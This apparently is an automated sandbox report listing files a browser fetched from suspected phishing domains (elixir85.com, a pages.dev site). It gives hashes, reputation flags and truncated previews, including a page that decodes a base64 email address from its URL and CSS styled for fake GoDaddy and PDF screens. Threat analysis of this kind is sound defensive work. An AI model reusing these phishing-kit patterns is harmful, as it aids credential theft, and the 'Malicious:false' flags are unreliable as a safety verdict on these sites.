                                                        Preview:.PNG........IHDR......./.............sRGB....... .IDATx^.].XSI.=. M....T.`...X......}.]..}...e.k..{.(*V...`...o&..)i/......H2s..s.yo..Xa.0.......C@.....2f.C.!..`.0...`D..!..`.0..."F......Lc.0.......#z..............^..W......vEa..(R...W.o.J.km..k`.e.2.......`D.7.Z.w..!n......T....@..M.GO.892?+.....`.0...#...4..]n....{.Z....b...h..l.,...B.5b.0...........Vs......T...r.Wy...(..Gg..r....>&$.S.G.D.......]...I..S.....v.....9S.!..`.......F.'y3g...]+.fai.....T.....).%!.....{.7.u}}+a..p(X..]!...C.!.....l....W.Y..=[..K.wt...v....mD.5...ii....W.....z*#..0......D.....FV.w..,.T..............X.|..|.Let....F.d.W.Q.!..`....l...Wg..~.6./^..A.w..nE.}..`ff...S..p..>..!C.")).O.>E...9../?..+.b..H."p-R.N..X.h..&.!..`.h..6X...... ..33s..;Y...9u....c.w#..[^.suu...;%....W/.vymX<.2...`.0.4G....bx....C.vr+.5.I...h............8.".q...|v...[/....C.jUY\..9.!..`......5.t..K...-.R.4h....i..[\.N...<y,0j.l...G.z..7....H....e..y..R.N..(\.(....[.RSR..........w.......x.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (23398), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):23398
                                                        Entropy (8bit):5.104409455331282
                                                        Encrypted:false
                                                        SSDEEP:384:ztafGtz2omXX44PL5Ky0sdY8xbXnb4YEb0tkBSgfn:hafSz2omXX44PL5Ky0sdY8xbXnEYw0sz
                                                        MD5:C1C51D30D5E7094136F2D828349E520F
                                                        SHA1:10AE8971AD7A8798BC9732707FE4896B57541557
                                                        SHA-256:0C55057782E3B346C2B819574BFA916852BC8AC5BB4E01D56E8FBFFC22043C98
                                                        SHA-512:7CF90E58A309B53DB53570129780E0ABCEFA2802C1A6441C1A4B49DC265DF617220DC1072CEBDAE7A74C3CA85F5D87B606503BD48A60E049372BE5CAF39969F7
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/12C1tM2Y6lGcdYEVUZu6720
                                                        Preview:*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}*,input{margin:0}.p,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}.websitesections{height:100%;width:100vw;position:relative}#sections_godaddy,#sections_pdf{display:flex;flex-direction:column;height:100vh}#sections_pdf a{color:#fff;text-deco
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1434), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):1434
                                                        Entropy (8bit):5.780814020328209
                                                        Encrypted:false
                                                        SSDEEP:24:2jkm94/zKPccAv+KVCe2TLv138EgFB5vtTGJrdcl/1t4glvllLt41rE0oA8nwsLc:VKEctKo7R3evtTA2tX7m12nxLrwUnG
                                                        MD5:CAC624AB0C197840B2A21BE4B6F6CC58
                                                        SHA1:C4B8B421F6039CCB0421E814774789201138308D
                                                        SHA-256:CFCE45FEF72ED85DC66C57FD1FA7262F9686B08188832FBFCE26A7A467D455B0
                                                        SHA-512:15FAB78F7997A69C4C0A469893CC3D53D989C74736D4EFDE315005242B4545B4E8F694BEFF23D0899C59A6C3CD954F3905C7EAC4C438961931E12D666BB3A3BB
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://www.google.com/recaptcha/api.js
                                                        Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                        Category:downloaded
                                                        Size (bytes):28000
                                                        Entropy (8bit):7.99335735457429
                                                        Encrypted:true
                                                        SSDEEP:768:NDT1rKvlJOE1AgLlnGj8H58AJUcl5I17ML7FfNHubNIphqb:NDtKvyAhjHeACcl21YL7KNW+
                                                        MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                        SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                        SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                        SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/pqC74CTJePSu4Ivyz37z7VePwx37
                                                        Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (10017)
                                                        Category:downloaded
                                                        Size (bytes):10245
                                                        Entropy (8bit):5.437589264532084
                                                        Encrypted:false
                                                        SSDEEP:192:LRSvXVHfVj+WdqfkkoKhUBhMAcT6iuvBiFj0gba6qiG2pPj:LQvXVHXiNkMAcT6i+4mgPj
                                                        MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                        SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                        SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                        SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T190720Z&X-Amz-Expires=300&X-Amz-Signature=2954020ef3ae9b37bcd25c50a692a541af80978c55971e321c89a2f9def9fd71&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                        Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48316), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):48316
                                                        Entropy (8bit):5.6346993394709
                                                        Encrypted:false
                                                        SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                        MD5:2CA03AD87885AB983541092B87ADB299
                                                        SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                        SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                        SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):231
                                                        Entropy (8bit):6.725074433303473
                                                        Encrypted:false
                                                        SSDEEP:6:6v/lhPZsRtsa9hC0bKDHv5Ef30XY4qMa3IE6Aleup:6v/76eAhbSHusYX4E3
                                                        MD5:547988BAC5584B4608466D761E16F370
                                                        SHA1:C11BB71049702528402A31027F200184910A7E23
                                                        SHA-256:70E32B2DB3F079BB0295A85A0DB15ED9E5926294DD947938D6CFA595F5AB18B4
                                                        SHA-512:C4A76F6E94982D1CC02C2B67523A334E76BFDE525C1014D32DB9E7ECA0FA39A06F291ECFA94C8C6A49D488EA3ACF9C10DDF3CAD9515562010440863D0F08FBA3
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128
                                                        Preview:.PNG........IHDR..............w=.....sRGB.........IDATHK...1...Z......... #$#..-.. $$3..H...q.x.>.x..yY.|.@h.......$.B/..*Ec...J.}.....Rl..^.......#-...f.6p.cJigf...G.<.!.z..>a.+j....&U.....E/.._.`.d...~_....7...4`....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 41 x 52, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):61
                                                        Entropy (8bit):4.068159130770306
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlERNjTHxl/k4E08up:6v/lhPyz7Tp
                                                        MD5:2F1D281894D5911FB8F1CFCFFF9212BC
                                                        SHA1:261994270145AB28B493CFA769B87B5C89F61CCC
                                                        SHA-256:2ED25A4DDC517CD82CBB2E7BC918E93F7EFBEA7E790DB36745044DB991584E18
                                                        SHA-512:677451A5E983D31BCDDCA9CD1C1B2FA12B30EA0963CFFD618EFD294FDA917D7D3241FE1D164F99792A47A6B2D71190B60E9C2552D61F726D26ABAD9ABFC96DD4
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...)...4......J......IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):1469
                                                        Entropy (8bit):4.699888190641274
                                                        Encrypted:false
                                                        SSDEEP:24:hYkCRnSKXxQiWksIeWA9bQG0lExOeojTU4miqd4NN:wndrMJkHjTZmrCNN
                                                        MD5:082A6C3E2DA5C84A7999206296C592FE
                                                        SHA1:5BA03EDB1979C0B2550BB579D8CFDADC60C1F414
                                                        SHA-256:2C4C356320D90201AD8BCF1DD16418D247E89849BF00254A6404A95850472D01
                                                        SHA-512:28D1201EE43E0C06FEE2D7057C8BF6C2163AA9F340A9FF837365512B502E89DFECAF64D658B498E8EADEBEF1E5F731B3AF7DA880442CCD65E8FAEEA31200CFC1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/?utm_source=nohsins-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=new-post
                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>File loading</title>. <script>. // Function to get the value of a parameter from the URL. function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, " "));. }.. // Get the base64-encoded email parameter from the URL. var base64EmailParam = getParameterByName('email');.. // Decode the base64-encoded email. function decodeEmail(base64Email) {. return atob(base64Email);. }.. // If a base64-encoded email parameter is provided,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):170
                                                        Entropy (8bit):5.608307060739058
                                                        Encrypted:false
                                                        SSDEEP:3:YIzXl0f9Vy3qwLPjuAxqCVp/B0t/qjvJviSwfJBEUexaLjJp2ERh2in:YIjl0K3qw+Uqsv0tijASMEUexSJp2Eei
                                                        MD5:2D5B9F4C228A891206DD4B65ED02273E
                                                        SHA1:C39A69FDBAFDB10920C2FA1C5CF5AF51AD9D08F3
                                                        SHA-256:1C466837B5B6C9EA4E32376D1B7D33748DF54A20BB72079EFF622645A005F46E
                                                        SHA-512:1502B27F5B75D14A70F91ACE622F3D488798F99656E8632E5B1213B24434F41803E34B22214A6C8C2B44D58FC3D72004B9D58337EB833DD0AECC3C51B6FA1090
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"message":"Route GET:/nifpyfuwrptybwamhqjifvdpkdSUBupTOFEKFMKMMHWTBNFLLVDHGJXSUFNYTXJFVQHZQpqTKFJlwZCJgDwI7yzBldhljwwx40 not found","error":"Not Found","statusCode":404}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):7390
                                                        Entropy (8bit):4.02755241095864
                                                        Encrypted:false
                                                        SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):1864
                                                        Entropy (8bit):5.222032823730197
                                                        Encrypted:false
                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):35970
                                                        Entropy (8bit):7.989503040923577
                                                        Encrypted:false
                                                        SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                        MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                        SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                        SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                        SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/12uyZYHBH78nzrKfwqr47
                                                        Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):270
                                                        Entropy (8bit):4.840496990713235
                                                        Encrypted:false
                                                        SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                        MD5:40EB39126300B56BF66C20EE75B54093
                                                        SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                        SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                        SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):70712
                                                        Entropy (8bit):6.94130504124589
                                                        Encrypted:false
                                                        SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                        MD5:F70FF06D19498D80B130EC78176FD3FF
                                                        SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                        SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                        SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):49602
                                                        Entropy (8bit):7.881935507115631
                                                        Encrypted:false
                                                        SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                        MD5:DB783743CD246FF4D77F4A3694285989
                                                        SHA1:B9466716904457641B7831868B47162D8D378D41
                                                        SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                        SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209
                                                        Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):7390
                                                        Entropy (8bit):4.02755241095864
                                                        Encrypted:false
                                                        SSDEEP:192:cdEMK4RwidEMK4Rwbwm6xiD7x9m9t6EQ3FabrItDWOO6DcA:cdEMVwidEMVwbwtxiDHmP6lFeItDWOOc
                                                        MD5:B59C16CA9BF156438A8A96D45E33DB64
                                                        SHA1:4E51B7D3477414B220F688ADABD76D3AE6472EE3
